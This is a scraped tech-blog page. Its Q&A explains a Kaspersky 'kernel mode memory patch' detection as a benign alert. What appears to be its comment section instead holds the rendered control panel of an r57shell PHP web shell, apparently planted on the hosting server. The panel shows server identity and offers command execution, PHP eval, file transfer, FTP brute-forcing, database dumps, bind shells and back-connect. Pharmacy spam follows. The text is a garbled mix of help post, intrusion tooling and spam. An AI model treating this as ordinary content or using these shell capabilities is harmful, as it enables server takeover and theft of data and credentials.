Kernel Bench

Kernel News and How To

25
Jun

On Kapersky Internet Security software… HELP (KERNEL MODE MEMORY PATCH)?

by admin
Kernel Software

I recently got Kapersky Internet Security software, and it has never actively informed me of their being any problems, but just out of curiousity I opened the software and it said that there had been 2 threats, "Kernel Patch Memory Mode". i looked this up, and no one said it was anything too bad so I just ignored it.

Today when I opened the software to update it, the number of "riskware"s had gone up to four, and apparently this had occured as soon as I turned my laptop on. What is this? Is it dangerous, or does the fact that it hadn’t alerted me about these "riskwares" mean that it has already dealt with them?

help please someone, I don’t really understand what a "kernel mode memory patch" is, after researching it.

During the application installation you can select the protection mode. Two modes are available
which are Automatic and interactive…. did you choose interactive as most choose automatic which
means KIS deal with everything in the recommended manner.

This can be changed if required….which lets KIS decide what to do when an event happens.

http://support.kaspersky.com/kis2010/tech?qid=208280386

I have started with the above as in the link below it says …….If the interactive mode is enabled in the Kaspersky Internet Security 2010 settings and in the Proactive Defense component settings the Prompt for action option is selected (the option is available only in versions from 9.0.0.736), then in some cases the Kaspersky Internet Security 2010 dialog window that will inform you about suspicious activity may appear. The process will be detected as Process (PID: 0): kernel mode memory patch………….and it goes on to say the following……

Keyloggers may send your personal information (logins, passwords, credit card numbers) you enter using your keyboard to a cyber criminal. HOWEVER, similar actions can be performed not only by malicious programs, but also by some other not malicious applications installed on your computer. Very often these actions are performed by means of hotkeys to access some functions of an application installed on your computer.

The process kernel mode memory patch (PID: 0) is not malicious. You can add this process to the exclusions list by clicking Add to exclusions and How to do that can be seen in the link below.

This appears nothing to worry about ….Just KIS being Pedantic.

What you find under detected threats is not as important as what is under ACTIVE THREATS.

1 Comment
1079

One Comment

r57shell 404 Not Found

404 Not Found

The server can not find the requested page:

127.0.0.1/r57shell/version.php?version=124 (port 80)

Please forward this error screen to 127.0.0.1's WebMaster.

   !  r57shell 1.24   08-02-2012 00:34:40  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]
  safe_mode: OFF  PHP version: 5.2.17  cURL: ON  MySQL: ON  MSSQL: OFF  PostgreSQL: ON  Oracle: OFF
  Disable functions : NONE
  HDD Free : 340.69 GB HDD Total : 802.94 GB
uname -a : 
sysctl : 
$OSTYPE : 
Server : 
id : 
pwd : 
   Linux useast6.myserverhosts.com 2.6.18-338.5.1.el5.lve0.8.29 #1 SMP Sat Apr 23 01:52:48 EEST 2011 x86_64 x86_64 x86_64 G
   -
   linux-gnu
   Apache
   uid=1610(kernelx7) gid=1598(kernelx7) groups=1598(kernelx7)
   /home/kernelx7/public_html   ( drwxr-x--- )
Executed command: ls -lia
:: Execute command on server  ::
Run command ?
Work directory ?    
:: Edit files  ::
File for edit ?    
:: Aliases  ::
         Select alias ?        
:: Find text in files  ::
Find text ?    
In dirs ? * ( /root;/home;/tmp )
Only in files ?* ( .txt;.php;.htm )
:: Search text in files via find  ::
Text for find ?    
Find in folder ? * ( /root;/home;/tmp )
Find in files ? * you can use regexp
:: Eval PHP code  ::

 
:: Upload files on server  ::
Local file ?
 New name ?    
:: Upload files from remote server  ::
With ?  Remote file ?
Local file ?    
:: Download files from server  ::
file ?    
Archivation ? without archivation zip gzip bzip
:: FTP  ::
Download files from remote ftp-server
FTP-server:port ?
Login ?
Password ?
File on ftp ?
Local file ?
Transfer mode ?
Send file to remote ftp server
FTP-server:port ?
Login ?
Password ?
Local file ?
File on ftp ?
Transfer mode ?
:: FTP-bruteforce  ::
FTP-server:port ?    
* use username from /etc/passwd for ftp login and password ( Users list )
Use reverse (user -> resu) login for password
:: Mail  ::
Send email
To ?
From ?
Subj ?
Mail ?
Send file to email
To ?
From ?
Subj ?
Local file ?
Archivation ? without archivation zip gzip bzip
:: Databases  ::
Show database structure
Type ?
Port ?
Login ?
Password ?
show tables ?
show columns ?
Dump database table
Type ?
Port ?
Login ?
Password ?
Database ?
Table ?
Save dump in file ?
file ?
Run SQL query
Type ?
Port ?
Login ?
Password ?
Database ?
SQL query ?

:: Net  ::
Bind port to /bin/bash
Port ?
Password for access ?
Use ?
back-connect
IP ?
Port ?
Use ?
datapipe
Local port ?
Remote host ?
Remote port ?
Use ?
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.24 ]---o

 WP Glamour
Kernel Bench is proudly powered by WordPress
Entries (RSS) and Comments (RSS).

192.168.1.1
100 mg viagra